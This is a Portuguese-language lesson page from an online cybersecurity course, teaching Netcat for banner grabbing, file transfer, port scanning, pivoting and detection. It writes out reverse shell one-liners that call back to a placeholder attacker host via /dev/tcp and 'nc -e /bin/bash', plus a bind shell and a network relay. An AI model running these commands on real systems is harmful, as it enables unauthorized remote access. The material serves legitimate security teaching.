Netcat: o Canivete Suíço
Use nc para obter banners, transferir arquivos, encaminhar portas e criar shells reversos simples.
Netcat: o Canivete Suíço é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 3 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.
O que é o Netcat
O Netcat (nc) é um utilitário que lê e grava dados por meio de conexões de rede usando TCP ou UDP. Ele está instalado em praticamente todos os sistemas Unix e é indispensável para depuração, transferência de arquivos e exploração básica.
Conexão básica e captura de identificadores
Conecte-se a qualquer porta TCP para capturar o identificador do serviço e interagir manualmente com o protocolo. Esta é a forma mais simples de reconhecimento.
# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]
# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTPEscuta em uma porta
O Netcat pode escutar conexões recebidas com -l -p. Isso é útil para testar a conectividade, capturar terminais reversos e receber arquivos.
# Listen on port 4444
nc -lvnp 4444
# -l listen
# -v verbose
# -n no DNS resolution
# -p port numberTransferência de arquivos com Netcat
O Netcat pode enviar arquivos encaminhando-os para uma conexão. O receptor escuta e redireciona a saída para um arquivo. Não há criptografia — use-o somente em redes confiáveis.
# Receiver (runs first):
nc -lvnp 4444 > received_file.txt
# Sender:
nc 192.168.1.10 4444 < file_to_send.txtVarredura de portas com Netcat
O Netcat pode fazer uma varredura básica de portas com -z (modo sem entrada/saída) e -w (tempo limite). É mais lento que o Nmap, mas é útil quando o Nmap não está disponível.
# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded
# With timeout:
nc -zvw2 192.168.1.100 22 80 443Terminal reverso simples
Um terminal reverso faz com que o alvo se conecte de volta ao invasor. Ele é útil em testes de intrusão quando as regras do firewall bloqueiam conexões de entrada para o alvo.
# Attacker listens:
nc -lvnp 4444
# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Or via nc:
nc attacker_ip 4444 -e /bin/bashTerminal vinculado
Um terminal vinculado fica escutando na máquina-alvo. O invasor se conecta a ele. É menos comum nos testes de intrusão modernos, pois os firewalls geralmente bloqueiam conexões de entrada.
# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash
# On attacker: connect
nc target_ip 5555Modo UDP
Use -u para conexões UDP. Isso é útil para testar serviços UDP, como DNS (porta 53) e SNMP (porta 161).
# Test DNS over UDP
nc -u 8.8.8.8 53
# Test SNMP
nc -u 192.168.1.1 161Uso de proxy com Netcat
O Netcat pode encadear conexões para permitir a movimentação entre redes. Combinado com canais nomeados (mkfifo), ele cria túneis bidirecionais simples sem ferramentas adicionais.
mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipeNcat: a alternativa moderna
O Ncat (parte do Nmap) amplia o Netcat com suporte a SSL (--ssl), controle de acesso e modo intermediário. Prefira o Ncat para canais criptografados.
# SSL listener
ncat --ssl -lvnp 4444
# SSL connect
ncat --ssl target_ip 4444Defensores: detecção do Netcat
As conexões do Netcat se parecem com conexões TCP normais. Os defensores podem detectá-lo monitorando nomes de processos (HIDS), observando portas de saída incomuns e identificando terminais iniciados por processos-pai inesperados.
Verificação rápida
Qual opção do Netcat habilita o modo de escuta?
Resumo: Netcat
O Netcat é uma ferramenta fundamental: use-o para capturar identificadores, transferir arquivos, testar a conectividade e entender a mecânica de terminais reversos e vinculados. Em testes de intrusão autorizados, ele valida regras de firewall e simula a movimentação do invasor entre redes. Conheça-o bem — tanto para usá-lo quanto para detectá-lo.
Perguntas Frequentes
A aula “Netcat: o Canivete Suíço” é grátis?
Sim — o texto completo de “Netcat: o Canivete Suíço” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.
O que vou aprender em “Netcat: o Canivete Suíço”?
Use nc para obter banners, transferir arquivos, encaminhar portas e criar shells reversos simples. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Cyber Security Academy?
Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 3 de 4.
Quanto tempo leva a aula “Netcat: o Canivete Suíço”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Cyber Security Academy?
Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Técnicas de Varredura de Portas com Nmap
- Identificação de Serviços e Sistemas Operacionais
- Netcat: o Canivete Suíço
- Criação de Scripts para Enumeração de Redes